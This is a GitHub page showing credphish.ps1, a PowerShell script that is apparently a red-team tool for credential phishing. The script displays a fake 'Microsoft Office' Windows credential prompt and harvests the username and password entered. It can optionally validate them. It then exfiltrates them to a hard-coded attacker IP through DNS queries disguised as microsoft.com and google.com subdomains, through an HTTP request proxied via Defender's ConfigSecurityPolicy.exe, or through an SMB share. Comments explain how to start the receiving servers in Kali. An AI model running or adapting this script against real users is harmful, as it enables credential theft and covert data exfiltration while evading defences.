-
Notifications
You must be signed in to change notification settings - Fork 45
/
Copy pathcredphish.ps1
executable file
·122 lines (108 loc) · 4.32 KB
/
credphish.ps1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
# exfil address
$exfilServer = "192.168.56.112"
# prompt
$targetUser = $env:username
$companyEmail = "blackhillsinfosec.com"
$promptCaption = "Microsoft Office"
$promptMessage = "Connecting to: $targetUser@$companyEmail"
$maxTries = 1 # maximum number of times to invoke prompt
$delayPrompts = 2 # seconds between prompts
$validateCredentials = $false # interrupt $maxTries and immediately exfil if credentials are valid
# dns
# start dns server in kali: python3 /path/to/credphish/dns_server.py
$enableDnsExfil = $true
$exfilDomains = @('.microsoft.com', '.google.com', '.office.com', '.live.com') # domains for dns exfil
$randomDelay = get-random -minimum 1 -maximum 10 # delay between dns queries
$subdomainLength = 6 # maximum chars in subdomain. must be an even number between 2-60 or queries may break
# http
# start http server in kali: python3 -m http.server 80
$enableHttpExfil = $false
$httpPort = 80
$ConfigSecurityPolicy = "C:\Prog*Files\Win*Defender\ConfigSecurityPolicy.exe"
# smb
# start smb server in kali: impacket-smbserver -smb2support exfilShare ${PWD}
$enableSmbExfil = $false
$shareName = "exfilShare" # must match share in impacket-smbserver (i.e., exfilShare)
$outputFile = "credentials.txt" # filename of exfiltrated credentials
##########################################################################
$exfilCount = 0
function invokeDnsExfil(){
$subdomain = ""
function invokeDnsResolve(){
$hex = @()
for($j=0;$j -lt $subdomain.length;$j++){
$b = "{0:X}" -f ([int]$subdomain[$j])
$hex = $hex + $b
}
$randomDomain = get-random -maximum ($exfilDomains.count)
$exfil = ($hex -join '') + $exfilDomains[($randomDomain)]
resolve-dnsname $exfil.ToLower() -Type A -Server $exfilServer | out-null
start-sleep -Seconds $randomDelay
}
foreach ($c in 0..$capturedCreds.Length){
$subdomain += $capturedCreds[$c]
if (($subdomain.Length * 2) -ge $subdomainLength){
invokeDnsResolve
$subdomain = ""
$exfilCount = 0
}else{
$exfilCount++
}
}
if ($subdomain) {
invokeDnsResolve
}
}
function invokeHttpExfil(){
$httpServer = 'http://' + $exfilServer + ':' + $httpPort + '/' + [uri]::EscapeDataString($capturedCreds)
if (test-path -path $ConfigSecurityPolicy) {
& $ConfigSecurityPolicy $httpServer
}else{
# HTTP method w/ Invoke-WebRequest (lame)
Invoke-WebRequest -UseBasicParsing $httpServer | Out-Null
}
}
function invokeSmbExfil(){
$capturedCreds | Out-File -Encoding utf8 \\$exfilServer\$shareName\$outputFile
}
function testCredentials(){
$securePassword = ConvertTo-SecureString -AsPlainText $phish.CredentialPassword -Force
$secureCredentials = New-Object System.Management.Automation.PSCredential($phish.CredentialUsername, $securePassword)
Start-Process ipconfig -Credential $secureCredentials
return $?
}
Add-Type -AssemblyName System.Runtime.WindowsRuntime
$asTask = ([System.WindowsRuntimeSystemExtensions].GetMethods() | `
? { $_.Name -eq 'AsTask' -and $_.GetParameters()[0].ParameterType.Name -eq 'IAsyncOperation`1' })[0]
[void][Windows.Security.Credentials.UI.CredentialPicker, Windows.Security.Credentials.UI, ContentType = WindowsRuntime]
$asTask = $asTask.MakeGenericMethod(([Windows.Security.Credentials.UI.CredentialPickerResults]))
$opt = [Windows.Security.Credentials.UI.CredentialPickerOptions]::new()
$opt.AuthenticationProtocol = 0
$opt.Caption = $promptCaption
$opt.Message = $promptMessage
$opt.TargetName = '1'
$count = 0
$ErrorActionPreference = 'SilentlyContinue'
[system.collections.arraylist]$harvestCredentials = @()
while (!($validPassword -Or $count -eq $maxTries)){
start-sleep -s $delayPrompts
$phish = $asTask.Invoke($null, @(([Windows.Security.Credentials.UI.CredentialPicker]::PickAsync($opt)))).Result
[void]$harvestCredentials.Add($phish.CredentialUsername + ':' + $phish.CredentialPassword)
if (!($phish.CredentialPassword) -Or !($phish.CredentialUsername)){
Continue
}
if ($validateCredentials){
$validPassword = testCredentials
}
$count++
}
$capturedCreds = $env:computername + '[' + ($harvestCredentials -join ',') + ']'
if ($enableDnsExfil){
invokeDnsExfil
}
if ($enableHttpExfil){
invokeHttpExfil
}
if ($enableSmbExfil){
invokeSmbExfil
}